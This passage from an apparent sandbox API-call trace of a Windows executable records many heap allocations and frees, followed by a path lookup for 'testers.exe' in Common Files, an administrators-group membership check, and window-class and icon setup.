Size=0xc) returned 0x883600 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883618 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883630 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883648 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883120 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883618 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883618 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883660 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883630 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883630 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883678 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x100) returned 0x883940 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8834b8 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883690 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876610 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8836a8 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876638 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883130 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x876610 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8836c0 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8836d8 [0276.843] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836a8 | out: hHeap=0x850000) returned 1 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8836a8 [0276.843] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2) returned 0x883140 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8836f0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883708 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883150 [0276.844] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883140 | out: hHeap=0x850000) returned 1 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883720 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883738 [0276.844] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836f0 | out: hHeap=0x850000) returned 1 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8836f0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x1c) returned 0x876610 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883750 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876660 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883140 [0276.844] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x876610 | out: hHeap=0x850000) returned 1 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883768 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883780 [0276.844] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883750 | out: hHeap=0x850000) returned 1 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883750 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883798 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837b0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837c8 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837e0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xac) returned 0x883a48 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837f8 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883810 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883828 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883840 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883858 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883870 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883888 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8838a0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8838b8 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8838d0 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8838e8 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883900 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883918 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883b18 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883b30 [0276.844] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883b48 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883b60 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883b78 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883b90 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883ba8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883bc0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883bd8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883bf0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883c08 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883c20 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883c38 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883c50 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883c68 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883c80 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883c98 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883cb0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883cc8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883ce0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883cf8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883d10 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883d28 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883d40 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883d58 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883d70 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883d88 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883da0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883db8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883dd0 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883de8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883e00 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883e18 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883e30 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883e48 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883e60 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883e78 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883e90 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883ea8 [0276.845] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883ec0 [0276.846] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883ed8 [0276.846] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883f18 [0276.846] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883f30 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a6f0 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a7b0 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a798 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a780 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a810 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a7c8 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a7e0 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a870 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a828 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a840 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a8d0 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a8b8 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a888 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a918 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a900 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a8e8 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a930 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a948 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a9a8 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a960 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a978 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a9c0 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa38 | out: hHeap=0x850000) returned 1 [0276.846] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a9f0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa08 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa50 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa68 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883558 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa80 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87aa98 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883570 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883588 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835d0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835b8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835a0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835e8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883600 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883660 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883618 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883630 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883678 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883690 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836d8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836c0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836a8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883738 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883720 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8836f0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883780 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883768 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883750 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883798 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837b0 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837c8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837e0 | out: hHeap=0x850000) returned 1 [0276.847] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837e0 [0276.847] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8837c8 [0276.847] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883160 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837c8 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883160 | out: hHeap=0x850000) returned 1 [0276.847] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837e0 | out: hHeap=0x850000) returned 1 [0276.847] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837e0 [0276.847] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x14) returned 0x87a628 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8837c8 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876610 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883160 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a628 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837b0 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883798 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837c8 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837c8 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x876688 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883750 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883768 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883780 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8836f0 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837e0 | out: hHeap=0x850000) returned 1 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883798 | out: hHeap=0x850000) returned 1 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837b0 | out: hHeap=0x850000) returned 1 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837c8 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x6) returned 0x883170 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8837c8 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883180 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837c8 | out: hHeap=0x850000) returned 1 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883170 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837c8 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837b0 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883798 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8837e0 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883170 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8837b0 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8837b0 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883720 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883798 | out: hHeap=0x850000) returned 1 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883798 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883180 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883738 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8836a8 [0276.848] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883190 [0276.848] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8836c0 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8836d8 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883738 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xa) returned 0x883738 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883690 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883180 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883690 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883738 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883738 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xe) returned 0x883690 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883678 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883180 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883678 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883690 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883690 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x12) returned 0x87a628 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x20) returned 0x8766b0 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x883180 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8766b0 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x87a628 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883678 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883630 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883618 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883660 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883600 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835e8 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x2) returned 0x883180 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8835a0 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x8835b8 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x4) returned 0x8831a0 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883180 | out: hHeap=0x850000) returned 1 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835d0 [0276.849] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883588 [0276.849] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x8835a0 | out: hHeap=0x850000) returned 1 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x8835a0 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883570 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x3c) returned 0x8622d0 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883558 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883f48 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0x10) returned 0x883f60 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883f78 [0276.850] RtlAllocateHeap (HeapHandle=0x850000, Flags=0x0, Size=0xc) returned 0x883f90 [0276.860] IUnknown:Release (This=0x876520) returned 0x0 [0276.860] FreeLibrary (hLibModule=0x290000) returned 1 [0276.860] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969250 | out: hHeap=0x850000) returned 1 [0276.860] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x969238 | out: hHeap=0x850000) returned 1 [0276.860] HeapFree (in: hHeap=0x850000, dwFlags=0x0, lpMem=0x883940 | out: hHeap=0x850000) returned 1 [0276.860] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x75fc40, lpFilePart=0x77fc60 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x77fc60*="testers.exe") returned 0x2f [0276.861] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x8754c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x75fc2c | out: IsMember=0x75fc2c) returned 1 [0276.861] GetSysColorBrush (nIndex=15) returned 0x1100059 [0276.861] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0276.861] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x2400bf [0276.862] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x160107 [0276.863] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x2100d3 [0276.863] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x18018b [0276.864] RegisterClassExW (param_1=0x75fbfc) returned 0xc12d [0276.864] GetSysColorBrush (nIndex=15) returned 0x1100059 